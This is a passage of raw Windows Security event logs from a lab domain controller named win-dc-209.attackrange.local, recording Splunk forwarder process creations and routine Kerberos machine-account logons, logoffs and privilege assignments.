Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:51:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265014
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:51:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265016
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1034
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:51:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265018
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8A620D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {91CA8262-9E50-FD4E-69C1-B65F14ACC796}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53909
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:51:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265017
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8A620D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:51:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265020
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: ATTACKRANGE\WIN-DC-209$
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8A686A
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {52856D24-E7E4-800D-C1D5-890AF5C2B413}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:51:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265019
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: ATTACKRANGE\WIN-DC-209$
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8A686A
Privileges: SeAuditPrivilege
SeImpersonatePrivilege
SeAssignPrimaryTokenPrivilege
04/19/2021 03:51:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265021
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8A620D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:51:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265024
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8A75A2
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:51:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265023
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8A75A2
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 64893
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:51:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265022
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8A75A2
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:52:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265025
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1510
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:52:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265027
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x544
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:52:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265026
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xad0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:52:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265028
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:52:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265030
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a88
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:52:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265029
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x104c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:52:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265031
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1734
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:52:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265037
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AA622
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:52:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265036
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8AA622
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 64904
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:52:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265035
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AA622
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:52:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265034
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AA5B6
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:52:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265033
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8AA5B6
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 64903
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:52:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265032
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AA5B6
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:52:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265040
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AB109
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:52:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265039
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8AB109
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 64910
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
